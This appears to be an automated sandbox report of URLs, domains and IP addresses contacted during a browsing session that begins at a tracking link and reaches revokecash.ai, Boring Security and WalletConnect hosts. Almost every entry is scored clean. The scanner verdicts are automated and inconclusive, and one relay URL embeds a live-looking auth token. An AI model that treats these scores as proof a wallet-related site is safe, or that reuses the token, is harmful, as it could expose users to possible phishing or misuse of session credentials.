https://ctrk.klclick.com/l/01HHA7T34SH51AXCSV6CC50V39_20%Avira URL Cloudsafe
https://ctrk.klclick.com/l/01HHA7T34SH51AXCSV6CC50V39_20%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://openjsf.org/0%URL Reputationsafe
https://discord.com/assets/62768.232f00c591becc89b0ca.js0%Avira URL Cloudsafe
https://notcommon.com/revokecash?verify=true0%Avira URL Cloudsafe
https://boringsecurity.com/_ipx/w_1080,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg&w=1080&q=750%Avira URL Cloudsafe
https://boringsecurity.com/_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_fantasy_a05d6f97a9.jpeg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_fantasy_a05d6f97a9.jpeg&w=48&q=750%Avira URL Cloudsafe
https://boringsecurity.com/_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png&w=48&q=750%Avira URL Cloudsafe
https://notcommon.com/revokecash?verify=true0%VirustotalBrowse
https://discord.com/invite/boringsecurity?locale=ar0%Avira URL Cloudsafe
https://boringsecurity.com/favicon.ico0%Avira URL Cloudsafe
about:blank0%Avira URL Cloudsafe
https://discord.com/0%Avira URL Cloudsafe
https://discord.com/assets/17744.a586cfff7253ad1f7ffe.js0%Avira URL Cloudsafe
https://discord.com/assets/13942.42b3309fce7f57e5eb63.js0%Avira URL Cloudsafe
https://discord.com/assets/72870.d7e30a37a080f43af084.js0%Avira URL Cloudsafe
https://discord.com/assets/70941.610eda6b5366c83284d8.js0%Avira URL Cloudsafe
https://discord.com/assets/17744.a586cfff7253ad1f7ffe.js0%VirustotalBrowse
https://discord.com/assets/31717.600d5111130648c4f7c5.js0%Avira URL Cloudsafe
https://discord.com/assets/68560.e27fd85667a295676749.js0%Avira URL Cloudsafe
https://discord.com/0%VirustotalBrowse
https://discord.com/assets/25b01771fdb72758a986.js0%Avira URL Cloudsafe
https://boringsecurity.com/_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg&w=1080&q=750%Avira URL Cloudsafe
https://discord.com/assets/72870.d7e30a37a080f43af084.js0%VirustotalBrowse
https://discord.com/assets/18814.8a9d7b31f5a23de4ecfd.js0%Avira URL Cloudsafe
https://discord.com/assets/19263.fe32553ff71153cb7656.js0%Avira URL Cloudsafe
https://discord.com/assets/77015.bb8daebc6abe745c8fdd.js0%Avira URL Cloudsafe
https://boringsecurity.com/_next/static/chunks/364.0af60d1a7584dacb.js0%Avira URL Cloudsafe
https://discord.com/invite/boringsecurity?locale=pl0%Avira URL Cloudsafe
https://discord.com/assets/app.83f01b3df65cd0fa3bb9.css0%Avira URL Cloudsafe
https://discord.com/assets/70941.610eda6b5366c83284d8.js0%VirustotalBrowse
https://discord.com/assets/19263.fe32553ff71153cb7656.js0%VirustotalBrowse
https://discord.com/assets/18814.8a9d7b31f5a23de4ecfd.js0%VirustotalBrowse
https://discord.com/assets/79417.40e5966eb87d1ff2ee44.js0%Avira URL Cloudsafe
https://discord.com/assets/sentry.14a93a5009fad9a88b94.js0%Avira URL Cloudsafe
https://discord.com/assets/361309226d7befece320.js0%Avira URL Cloudsafe
https://discord.com/assets/shared.f01e9143e31c19a68a8e.css0%Avira URL Cloudsafe
https://discord.com0%Avira URL Cloudsafe
https://revokecash.ai/_img/notcommon.svg0%Avira URL Cloudsafe
https://revokecash.ai/_img/premint.jpg0%Avira URL Cloudsafe
https://discord.com/assets/1af9bdf041e000508e41.svg0%Avira URL Cloudsafe
https://discord.com0%VirustotalBrowse
https://boringsecurity.com/_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_MAYC_7e6a35562a.png&w=48&q=750%Avira URL Cloudsafe
https://openchain.xyz/signatures?query=$0%Avira URL Cloudsafe
https://discord.com/assets/79417.40e5966eb87d1ff2ee44.js0%VirustotalBrowse
https://discord.com/assets/09563300dbb31ab193bc.js0%Avira URL Cloudsafe
https://discord.com/assets/58247.6146ce4a4e300aea8b79.js0%Avira URL Cloudsafe
https://openchain.xyz/signatures?query=$0%VirustotalBrowse
https://discord.com/assets/6377de1b7ec4e85ff431.js0%Avira URL Cloudsafe
https://boringsecurity.com/_next/static/chunks/webpack-2f410aecd915a041.js0%Avira URL Cloudsafe
https://cms.boringsecurity.com/graphql/0%Avira URL Cloudsafe
https://discord.com/assets/23398.99046fdebb0d52a5294c.js0%Avira URL Cloudsafe
https://discord.com/assets/58247.6146ce4a4e300aea8b79.js0%VirustotalBrowse
https://discord.com/assets/1af9bdf041e000508e41.svg0%VirustotalBrowse
https://revokecash.ai/_css/56d1f5034e1e3936.css0%Avira URL Cloudsafe
https://revokecash.ai/_img/boring-security.png0%Avira URL Cloudsafe
https://discord.com/assets/37102.04489c88475d6b93636f.js0%Avira URL Cloudsafe
https://discord.com/assets/23398.99046fdebb0d52a5294c.js0%VirustotalBrowse
https://discord.com/assets/09563300dbb31ab193bc.js0%VirustotalBrowse
https://discord.com/assets/22198.60494a9d4db5b29906c5.js0%Avira URL Cloudsafe
https://discord.com/assets/26230.a8a95f983d9bf704aebc.js0%Avira URL Cloudsafe
https://discord.com/assets/76546.c03cce63ade2b24646c3.js0%Avira URL Cloudsafe
https://revokecash.ai/_img/revoke.svg0%Avira URL Cloudsafe
https://discord.com/assets/34426.aefa163dd8b10b7ac8cc.js0%Avira URL Cloudsafe
https://boringsecurity.com/_next/static/chunks/940-c7b68c0e005aa30a.js0%Avira URL Cloudsafe
https://boringsecurity.com/_next/static/chunks/331.02933a2f314cb75f.js0%Avira URL Cloudsafe
https://layer3.xyz0%Avira URL Cloudsafe
https://discord.com/assets/7442b576347c1d02886f.svg0%Avira URL Cloudsafe
https://discord.com/assets/98106.5d0f74b94113ede84656.js0%Avira URL Cloudsafe
https://relay.walletconnect.com/?auth=eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkaWQ6a2V5Ono2TWt0cWZHOEFlMTE1M1k2TnBrTmZUVk1XYUo4YUs3dFRwbTRwMzJydWhUZFExWCIsInN1YiI6ImVkYjNmNWI5YjU0YjcwOTc3MGI3ZmFhMzVjMWQxNGZhZjg2MGMwZjY1NWQwZDJkMDg1MWE2MTNiZDMzNWVkYmQiLCJhdWQiOiJ3c3M6Ly9yZWxheS53YWxsZXRjb25uZWN0LmNvbSIsImlhdCI6MTcwMjIyNjY2OSwiZXhwIjoxNzAyMzEzMDY5fQ.f-2JaT4aS5waFXxJLIZtdIHQjpTzrTWyftvRNtMXZmcE73M8B8WIqt9_DRx7Pkh1EEllzj92AS0ex4X8upvGBA&projectId=4de540f0804c83871ac4d89ebb9031e9&ua=wc-2%2Fjs-2.9.0%2Fwindows10-chrome-117.0.0%2Fbrowser%3Arevokecash.ai&useOnCloseEvent=true0%Avira URL Cloudsafe
https://discord.com/assets/99742.217a8e519977f9b5cbf0.js0%Avira URL Cloudsafe
https://discord.com/assets/6086.1339c227c38e3c5b2586.js0%Avira URL Cloudsafe
https://boringsecurity.com/images/grill.jpg0%Avira URL Cloudsafe
https://discord.com/assets/68291.687557b9b660607399a3.js0%Avira URL Cloudsafe
https://discord.com/assets/3f46bbecb4287c0a829f.woff20%Avira URL Cloudsafe
https://discord.com/invite/boringsecurity?locale=nl0%Avira URL Cloudsafe
https://discord.com/assets/321a07cbc6f5919dbce9.svg0%Avira URL Cloudsafe
https://discord.com/assets/18407.d0257553d76c1da19de7.js0%Avira URL Cloudsafe
https://discord.com/assets/e9e649f003bbece806b1.js0%Avira URL Cloudsafe
http://discord.gg/fortnite).0%Avira URL Cloudsafe
https://discord.com/assets/53526.ad1fa7caed5e70d3ddc2.js0%Avira URL Cloudsafe
https://boringsecurity.com/_next/static/chunks/98-5331d5e48bc919a7.js0%Avira URL Cloudsafe
https://discord.com/invite/boringsecurity?locale=no0%Avira URL Cloudsafe
https://boringsecurity.com/_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png&w=48&q=750%Avira URL Cloudsafe
https://boringsecurity.com0%Avira URL Cloudsafe
https://discord.com/assets/94288.dbd73ecb6b1482a870b7.js0%Avira URL Cloudsafe
https://discord.com/assets/69288.312b5f484a6756663ca9.js0%Avira URL Cloudsafe
https://discord.com/assets/47387.4470209d33fc5d80f673.js0%Avira URL Cloudsafe
https://www.vulcan.xyz0%Avira URL Cloudsafe
https://discord.com/assets/49191.d845556dff27841ecd1e.js0%Avira URL Cloudsafe
https://boringsecurity.com/images/BoringSecurityMurAll.png0%Avira URL Cloudsafe
https://dis.gd/clyde0%Avira URL Cloudsafe
https://discord.com/assets/23992.3dc89a4c11d1402ff9e7.js0%Avira URL Cloudsafe
https://boringsecurity.com/images/bs_x_murall_160.jpg0%Avira URL Cloudsafe
https://discord.com/assets/22843.1bda3edd4dd152273661.js0%Avira URL Cloudsafe
https://discord.com/assets/1f3e315f020ed5635dc1.svg0%Avira URL Cloudsafe
https://discord.com/assets/58409.1811376ebb7f14b0be53.js0%Avira URL Cloudsafe
https://discord.com/assets/44d5e1639bc492dc8d62.svg0%Avira URL Cloudsafe
https://discord.com/assets/65573.3d56d56002765d7a9da8.js0%Avira URL Cloudsafe
https://boringsecurity.com/_ipx/w_64,q_75/%2Fimages%2Flogo.png?url=%2Fimages%2Flogo.png&w=64&q=750%Avira URL Cloudsafe
https://discord.com/assets/7105.da032cdf2d68f70cd9db.js0%Avira URL Cloudsafe
https://discord.com/assets/e4c0cffdca343bc93615.js0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    apex-loadbalancer.netlify.com
    75.2.60.5
    truefalse
      unknown
      accounts.google.com
      192.178.50.45
      truefalse
        high
        discord.com
        162.159.137.232
        truefalse
          unknown
          relay.walletconnect.org
          18.141.17.51
          truefalse
            unknown
            www.walletlink.org
            104.18.37.8
            truefalse
              unknown
              d319s8zqhriqme.cloudfront.net
              18.66.255.33
              truefalse
                high
                explorer-api.walletconnect.com
                104.18.27.46
                truefalse
                  unknown
                  relay.walletconnect.com
                  52.205.234.209
                  truefalse
                    unknown
                    cdn.discordapp.com
                    162.159.130.233
                    truefalse
                      high
                      revokecash.ai
                      104.21.1.228
                      truefalse
                        unknown
                        cms.boringsecurity.com
                        23.92.19.144
                        truefalse
                          unknown
                          s3-w.us-east-1.amazonaws.com
                          3.5.25.121
                          truefalse
                            high
                            discord.gg
                            162.159.134.234
                            truefalse
                              unknown
                              code.jquery.com
                              151.101.66.137
                              truefalse
                                high
                                www.google.com
                                142.250.217.228
                                truefalse
                                  high
                                  clients.l.google.com
                                  192.178.50.46
                                  truefalse
                                    high
                                    unpkg.com
                                    104.16.123.175
                                    truefalse
                                      high
                                      boringsecurity.com
                                      unknown
                                      unknownfalse
                                        unknown
                                        boring-security-cms.s3.amazonaws.com
                                        unknown
                                        unknownfalse
                                          high
                                          clients2.google.com
                                          unknown
                                          unknownfalse
                                            high
                                            ctrk.klclick.com
                                            unknown
                                            unknownfalse
                                              unknown
                                              NameMaliciousAntivirus DetectionReputation
                                              https://unpkg.com/@web3modal/html@2.7.1/dist/cdn/index-fec845d6.jsfalse
                                                high
                                                https://unpkg.com/@web3modal/ethereum@2.7.1/dist/cdn/__polyfill-node.events-e75a050f.jsfalse
                                                  high
                                                  https://boring-security-cms.s3.amazonaws.com/thumbnail_baebee_15f9684169.jpgfalse
                                                    high
                                                    https://discord.com/assets/62768.232f00c591becc89b0ca.jsfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://boringsecurity.com/_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_fantasy_a05d6f97a9.jpeg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_fantasy_a05d6f97a9.jpeg&w=48&q=75false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://boringsecurity.com/_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png&w=48&q=75false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://boring-security-cms.s3.amazonaws.com/thumbnail_quit_b3e92694b1.pngfalse
                                                      high
                                                      https://boringsecurity.com/_ipx/w_1080,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg&w=1080&q=75false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://boringsecurity.com/favicon.icofalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://discord.com/assets/13942.42b3309fce7f57e5eb63.jsfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://boring-security-cms.s3.amazonaws.com/thumbnail_redzin_temp_1898f990e6.jpegfalse
                                                        high
                                                        https://boring-security-cms.s3.amazonaws.com/thumbnail_Bored_Ape_Yacht_Club_Bored_Ape_Yacht_Club_4073_1cb1c9b884.pngfalse
                                                          high
                                                          https://discord.com/assets/17744.a586cfff7253ad1f7ffe.jsfalse
                                                          • 0%, Virustotal, Browse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          about:blankfalse
                                                          • Avira URL Cloud: safe
                                                          low
                                                          https://discord.com/assets/72870.d7e30a37a080f43af084.jsfalse
                                                          • 0%, Virustotal, Browse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://discord.com/assets/70941.610eda6b5366c83284d8.jsfalse
                                                          • 0%, Virustotal, Browse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://discord.com/assets/31717.600d5111130648c4f7c5.jsfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://boring-security-cms.s3.amazonaws.com/thumbnail_ispeaknerd_9fc9526715.pngfalse
                                                            high
                                                            https://discord.com/assets/68560.e27fd85667a295676749.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/25b01771fdb72758a986.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://boringsecurity.com/_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg&w=1080&q=75false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/18814.8a9d7b31f5a23de4ecfd.jsfalse
                                                            • 0%, Virustotal, Browse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/19263.fe32553ff71153cb7656.jsfalse
                                                            • 0%, Virustotal, Browse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/77015.bb8daebc6abe745c8fdd.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://boringsecurity.com/_next/static/chunks/364.0af60d1a7584dacb.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/app.83f01b3df65cd0fa3bb9.cssfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/79417.40e5966eb87d1ff2ee44.jsfalse
                                                            • 0%, Virustotal, Browse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/sentry.14a93a5009fad9a88b94.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/361309226d7befece320.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/shared.f01e9143e31c19a68a8e.cssfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://revokecash.ai/_img/notcommon.svgfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://revokecash.ai/_img/premint.jpgfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/1af9bdf041e000508e41.svgfalse
                                                            • 0%, Virustotal, Browse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://boringsecurity.com/_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_MAYC_7e6a35562a.png&w=48&q=75false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/09563300dbb31ab193bc.jsfalse
                                                            • 0%, Virustotal, Browse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/58247.6146ce4a4e300aea8b79.jsfalse
                                                            • 0%, Virustotal, Browse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/6377de1b7ec4e85ff431.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://boringsecurity.com/_next/static/chunks/webpack-2f410aecd915a041.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://cms.boringsecurity.com/graphql/false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/23398.99046fdebb0d52a5294c.jsfalse
                                                            • 0%, Virustotal, Browse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://revokecash.ai/_css/56d1f5034e1e3936.cssfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://revokecash.ai/_img/boring-security.pngfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/37102.04489c88475d6b93636f.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/22198.60494a9d4db5b29906c5.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/34426.aefa163dd8b10b7ac8cc.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/26230.a8a95f983d9bf704aebc.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/76546.c03cce63ade2b24646c3.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://revokecash.ai/_img/revoke.svgfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://boringsecurity.com/_next/static/chunks/940-c7b68c0e005aa30a.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://boringsecurity.com/_next/static/chunks/331.02933a2f314cb75f.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/7442b576347c1d02886f.svgfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://discord.com/assets/98106.5d0f74b94113ede84656.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://relay.walletconnect.com/?auth=eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkaWQ6a2V5Ono2TWt0cWZHOEFlMTE1M1k2TnBrTmZUVk1XYUo4YUs3dFRwbTRwMzJydWhUZFExWCIsInN1YiI6ImVkYjNmNWI5YjU0YjcwOTc3MGI3ZmFhMzVjMWQxNGZhZjg2MGMwZjY1NWQwZDJkMDg1MWE2MTNiZDMzNWVkYmQiLCJhdWQiOiJ3c3M6Ly9yZWxheS53YWxsZXRjb25uZWN0LmNvbSIsImlhdCI6MTcwMjIyNjY2OSwiZXhwIjoxNzAyMzEzMDY5fQ.f-2JaT4aS5waFXxJLIZtdIHQjpTzrTWyftvRNtMXZmcE73M8B8WIqt9_DRx7Pkh1EEllzj92AS0ex4X8upvGBA&projectId=4de540f0804c83871ac4d89ebb9031e9&ua=wc-2%2Fjs-2.9.0%2Fwindows10-chrome-117.0.0%2Fbrowser%3Arevokecash.ai&useOnCloseEvent=truefalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://boring-security-cms.s3.amazonaws.com/thumbnail_kfxape_034a85ee89.pngfalse
                                                              high
                                                              https://discord.com/assets/99742.217a8e519977f9b5cbf0.jsfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://discord.com/assets/6086.1339c227c38e3c5b2586.jsfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://boringsecurity.com/images/grill.jpgfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://discord.com/assets/68291.687557b9b660607399a3.jsfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://a.nel.cloudflare.com/report/v3?s=5xcfuVpb5OLSi%2FBlksT5Mmy1%2BX0bIVjt09WKbJZN9ZN0DJVk3eHI8FDTQOIhttasaewS5fYNpgesULrSmcBqQAnQLEfQzIaWDKUDzWz7d3297ob8x1GA%2FvHyPDdsoQSvfalse
                                                                high
                                                                https://discord.com/assets/3f46bbecb4287c0a829f.woff2false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://unpkg.com/@web3modal/html@2.7.1false
                                                                  high
                                                                  https://discord.com/assets/321a07cbc6f5919dbce9.svgfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://discord.com/assets/18407.d0257553d76c1da19de7.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://discord.com/assets/e9e649f003bbece806b1.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://discord.com/assets/53526.ad1fa7caed5e70d3ddc2.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://boringsecurity.com/_next/static/chunks/98-5331d5e48bc919a7.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://boringsecurity.com/_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png&w=48&q=75false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://discord.com/assets/94288.dbd73ecb6b1482a870b7.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://discord.com/assets/69288.312b5f484a6756663ca9.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://discord.com/assets/47387.4470209d33fc5d80f673.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://discord.com/assets/49191.d845556dff27841ecd1e.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://boringsecurity.com/images/BoringSecurityMurAll.pngfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://discord.com/assets/23992.3dc89a4c11d1402ff9e7.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://boringsecurity.com/images/bs_x_murall_160.jpgfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://discord.com/assets/22843.1bda3edd4dd152273661.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://discord.com/assets/1f3e315f020ed5635dc1.svgfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://discord.com/assets/58409.1811376ebb7f14b0be53.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://discord.com/assets/44d5e1639bc492dc8d62.svgfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://discord.com/assets/65573.3d56d56002765d7a9da8.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://boringsecurity.com/_ipx/w_64,q_75/%2Fimages%2Flogo.png?url=%2Fimages%2Flogo.png&w=64&q=75false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://discord.com/assets/7105.da032cdf2d68f70cd9db.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://discord.com/assets/e4c0cffdca343bc93615.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                  https://tailwindcss.comchromecache_369.2.dr, chromecache_533.2.drfalse
                                                                    high
                                                                    https://twitter.com/discord).chromecache_433.2.drfalse
                                                                      high
                                                                      https://notcommon.com/revokecash?verify=truechromecache_541.2.dr, chromecache_549.2.drfalse
                                                                      • 0%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://discord.com/invite/boringsecurity?locale=archromecache_370.2.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://discord.com/chromecache_433.2.drfalse
                                                                      • 0%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://discord.com/invite/boringsecurity?locale=plchromecache_370.2.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://openjsf.org/chromecache_589.2.dr, chromecache_528.2.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://discord.comchromecache_370.2.drfalse
                                                                      • 0%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://openchain.xyz/signatures?query=$chromecache_568.2.drfalse
                                                                      • 0%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://underscorejs.org/LICENSEchromecache_589.2.dr, chromecache_528.2.drfalse
                                                                        high
                                                                        https://layer3.xyzchromecache_541.2.dr, chromecache_549.2.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://discord.com/invite/boringsecurity?locale=nlchromecache_370.2.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://discord.gg/fortnite).chromecache_433.2.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://discord.com/invite/boringsecurity?locale=nochromecache_370.2.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://boringsecurity.comchromecache_541.2.dr, chromecache_549.2.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.vulcan.xyzchromecache_541.2.dr, chromecache_549.2.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://dis.gd/clydechromecache_433.2.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://github.com/RevokeCash/revoke.cashchromecache_541.2.dr, chromecache_549.2.drfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          13.250.153.115
                                                                          unknownUnited States
                                                                          16509AMAZON-02USfalse
                                                                          3.5.25.121
                                                                          s3-w.us-east-1.amazonaws.comUnited States
                                                                          14618AMAZON-AESUSfalse
                                                                          52.217.229.121
                                                                          unknownUnited States
                                                                          16509AMAZON-02USfalse
                                                                          104.21.1.228
                                                                          revokecash.aiUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          104.16.123.175
                                                                          unpkg.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          162.159.130.233
                                                                          cdn.discordapp.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          23.92.19.144
                                                                          cms.boringsecurity.comUnited States
                                                                          63949LINODE-APLinodeLLCUSfalse
                                                                          151.101.66.137
                                                                          code.jquery.comUnited States
                                                                          54113FASTLYUSfalse
                                                                          35.190.80.1
                                                                          a.nel.cloudflare.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          162.159.134.234
                                                                          discord.ggUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          192.178.50.45
                                                                          accounts.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          192.178.50.46
                                                                          clients.l.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          162.159.138.232
                                                                          unknownUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          52.205.234.209
                                                                          relay.walletconnect.comUnited States
                                                                          14618AMAZON-AESUSfalse
                                                                          142.250.217.228
                                                                          www.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          75.2.60.5
                                                                          apex-loadbalancer.netlify.comUnited States
                                                                          16509AMAZON-02USfalse
                                                                          162.159.133.233
                                                                          unknownUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          172.67.152.105
                                                                          unknownUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          18.141.17.51
                                                                          relay.walletconnect.orgUnited States
                                                                          16509AMAZON-02USfalse
                                                                          162.159.137.232
                                                                          discord.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          239.255.255.250
                                                                          unknownReserved
                                                                          unknownunknownfalse
                                                                          104.18.37.8
                                                                          www.walletlink.orgUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          104.18.27.46
                                                                          explorer-api.walletconnect.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          3.213.155.136
                                                                          unknownUnited States
                                                                          14618AMAZON-AESUSfalse
                                                                          18.66.255.33
                                                                          d319s8zqhriqme.cloudfront.netUnited States
                                                                          3MIT-GATEWAYSUSfalse
